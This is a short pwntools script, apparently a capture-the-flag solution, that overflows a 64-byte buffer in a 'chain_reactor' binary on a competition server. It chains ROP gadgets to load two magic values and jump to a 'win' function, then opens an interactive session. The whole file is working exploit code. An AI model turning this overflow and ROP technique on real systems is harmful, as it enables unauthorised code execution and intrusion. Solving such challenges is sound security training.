from pwn import *

OFF = 64
pop_rdi = 0x000000000040121F
pop_rsi = 0x0000000000401221
ret = 0x000000000040101A
var1 = 0xC0FFEE
var2 = 0xBADC0DE
win = 0x0000000000401226
context.binary = elf = ELF("./chain_reactor", checksec=False)
# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13510)
print(p.recvuntil(b"[chain-reactor] Enter activation codes: "))
payload = flat(
    b"A" * 64,
    p64(ret),
    p64(pop_rdi),
    p64(var1),
    p64(pop_rsi),
    p64(var2),
    p64(win),
)
p.sendline(payload)
p.interactive()